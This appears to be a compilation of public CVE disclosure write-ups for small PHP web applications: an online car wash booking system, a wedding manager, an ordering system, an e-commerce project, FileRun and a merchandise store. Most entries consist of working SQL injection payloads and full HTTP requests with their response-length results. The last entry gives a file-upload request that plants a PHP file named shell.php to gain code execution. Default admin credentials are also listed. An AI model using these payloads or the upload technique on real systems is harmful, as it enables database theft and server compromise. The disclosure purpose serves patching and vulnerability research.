Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=delete_service.

Permalink

Cannot retrieve contributors at this time

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_service

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_service, id

\[+\] Payload: id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=delete\_service HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=services
Content-Length: 65
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=2' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31346: bug_report/SQLi-5.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/classes/Master.php?f=delete_vehicle.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/classes/Master.php?f=delete\_vehicle

Vulnerability location: /ocwbs/classes/Master.php?f=delete\_vehicle, id

\[+\] Payload: id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /ocwbs/classes/Master.php?f\=delete\_vehicle HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/ocwbs/admin/?page=vehicles
Content-Length: 65
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close
id=5' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

CVE-2022-31347: bug_report/SQLi-4.md at main · k0xx11/bug_report

Wedding Management System v1.0 is vulnerable to SQL Injection. via /Wedding-Management/admin/budget.php?booking_id=.

Permalink

**Wedding Management System v1.0 by codeastr.com has SQL injection**

Author： k0xx

The password for the backend login account is: admin@mail.com/Password@123

vendors: https://codeastro.com/wedding-management-system-in-php-with-source-code/

Vulnerability File: /Wedding-Management/admin/budget.php?booking\_id=

Vulnerability location: /Wedding-Management/admin/budget.php?booking\_id=,booking\_id

\[+\] Payload: /Wedding-Management/admin/budget.php?booking\_id=31%20and%20length(database())%20=%209&user\_id=31 // Leak place ---> booking\_id

Current database name: dbwedding,length is 9

GET /Wedding\-Management/admin/budget.php?booking\_id\=31%20and%20length(database())%20\=%209&user\_id\=31 HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 8, Content-Length: 814

When length (database ()) = 9, Content-Length: 9894

CVE-2022-30835: bug_report/SQLi-12.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/bookings/update_status.php?id=.

Permalink

Cannot retrieve contributors at this time

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/bookings/update\_status.php?id=

Vulnerability location: /ocwbs/admin/bookings/update\_status.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/bookings/update\_status.php?id=3%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/bookings/update\_status.php?id\=3%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 2012

When length (database ()) = 8, Content-Length: 2021

CVE-2022-31348: bug_report/SQLi-6.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/vehicles/manage_vehicle.php?id=.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/vehicles/manage\_vehicle.php?id=

Vulnerability location: /ocwbs/admin/vehicles/manage\_vehicle.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/vehicles/manage\_vehicle.php?id=5%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/vehicles/manage\_vehicle.php?id\=5%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 1978 

When length (database ()) = 8, Content-Length: 1997

CVE-2022-31350: bug_report/SQLi-7.md at main · k0xx11/bug_report

Online Ordering System By janobe 2.3.2 is vulneranle to SQL Injection via /ordering/index.php?q=products&id=.

Permalink

Cannot retrieve contributors at this time

**Online Ordering System By janobe has SQL injection vulnerability**

Author： k0xx

vendor: https://www.sourcecodester.com/php/12978/online-ordering-system-phpmysqli.html

Vulnerability file: /ordering/index.php?q=products&id=

Vulnerability location: /ordering/index.php?q=products&id= //id is Injection point

\[+\]Payload: /ordering/index.php?q=products&id=2%27%20and%20length(database())%20=12--+ //id is Injection point

Current database name: multistoredb,length is 12

GET /ordering/index.php?q\=products&id\=2%27%20and%20length(database())%20\=12\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=0m2td1md252hlnr3nsbmc5ss99
Connection: close

When length (database ()) = 11, Content-Length: 17564 

When length (database ()) = 12, Content-Length: 24330

CVE-2022-31327: bug_report/SQLi-1.md at main · k0xx11/bug_report

Online Car Wash Booking System v1.0 is vulnerable to SQL Injection via /ocwbs/admin/services/view_service.php?id=.

Permalink

**Online Car Wash Booking System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html

Vulnerability File: /ocwbs/admin/services/view\_service.php?id=

Vulnerability location: /ocwbs/admin/services/view\_service.php?id=, id

Current database name: ocwbs\_db,length is 8

\[+\] Payload: /ocwbs/admin/services/view\_service.php?id=2%27%20and%20length(database())%20=8--+ // Leak place ---> id

GET /ocwbs/admin/services/view\_service.php?id\=2%27%20and%20length(database())%20\=8\--\+ HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=qr1o26kvu55cqqitadqht6jna5
Connection: close

When length (database ()) = 7, Content-Length: 856 

When length (database ()) = 8, Content-Length: 932

CVE-2022-31353: bug_report/SQLi-8.md at main · k0xx11/bug_report

Ecommerce-project-with-php-and-mysqli-Fruits-Bazar 1.0 is vulnerable to SQL Injection in \search_product.php via the keyword parameters.

creativesaiful / **Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-** Public

*   Notifications
*   Fork 2
*   Star 3
    

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

3 stars 2 forks

Star

Notifications

*   Code
*   Issues
*   Pull requests
*   Actions
*   Projects
*   Wiki
*   Security
*   Insights

More

master

Switch branches/tags

**1** branch **0** tags

Code

**Latest commit**

creativesaiful somthing

c07a847

Sep 16, 2021

somthing

c07a847

**Git stats**

*   **25** commits

**Files**Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

admin

assets

includes

json

addtocart.php

all\_product.php

catagory.php

ecommerce.sql

exist\_order.php

index.php

readme.txt

search\_product.php

single\_product.php

user\_login.php

user\_password\_recover.php

user\_password\_update.php

user\_register.php

userprofile copy.php

userprofile.php

**readme.txt**

1\. First create a database name ecommerce in your database. Than import ecommerce.sql file in your ecommerce database.

admin access:
saifulislamsapon@gmail.com
pass:1234


user access:
saifulislamsapon@gmail.com
123

**About**

This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

**Topics**

ecommerce-website php-website php-project core-php project-samples php-admin-panel project-example basic-ecommerce full-stack-web-development

**Resources**

Readme

**Stars**

**3** stars

**Watchers**

**1** watching

**Forks**

**2** forks

**Releases**

No releases published

**Packages**

No packages published  

**Languages**

*   CSS 36.7%
*   JavaScript 29.0%
*   SCSS 25.1%
*   PHP 8.6%
*   Hack 0.6%

CVE-2022-30478: GitHub - creativesaiful/Ecommerce-project-with-php-and-mysqli-Fruits-Bazar-: This is an eCommerce project using Php, javaScript, Jquery, and Mysql.

In Afian Filerun 20220202 Changing the "search_tika_path" variable to a custom (and previously uploaded) jar file results in remote code execution in the context of the webserver user.

CVE-2022-30470: FileRun - Selfhosted File Manager with Sharing and Backup for Photos, Docs & More

Merchandise Online Store v1.0 by oretnom23 has an arbitrary code execution (RCE) vulnerability in the user profile upload point in the system information.

Permalink

Cannot retrieve contributors at this time

**Merchandise Online Store v1.0 by oretnom23 has arbitrary code execution (RCE)**

**Author** : ffYYy6x0y1

vendor: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

Vulnerability url: http://ip/vloggers\_merch/admin/?page=user

Loophole location： There is an arbitrary file upload vulnerability (RCE) in the user profile upload point in the system information.

Request package for file upload：

POST /vloggers\_merch/classes/Users.php?f\=save HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: \*/\*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/vloggers\_merch/admin/?page=user
Content-Length: 728
Content-Type: multipart/form-data; boundary=---------------------------972285327633
Cookie: PHPSESSID=ikts6n5evd3ahejiopufg6114g
Connection: close
\-----------------------------972285327633
Content-Disposition: form-data; name="id"
1
\-----------------------------972285327633
Content-Disposition: form-data; name="firstname"
Adminstrator
\-----------------------------972285327633
Content-Disposition: form-data; name="lastname"
Admin
\-----------------------------972285327633
Content-Disposition: form-data; name="username"
admin
\-----------------------------972285327633
Content-Disposition: form-data; name="password"
admin123
\-----------------------------972285327633
Content-Disposition: form-data; name="img"; filename="shell.php"
Content-Type: application/octet-stream
JFJF
<?php phpinfo();?>
\-----------------------------972285327633--

The files will be uploaded to this directory \\vloggers\_merch\\uploads

We visited the directory of the file in the browser and found that the code had been executed

Tag

#php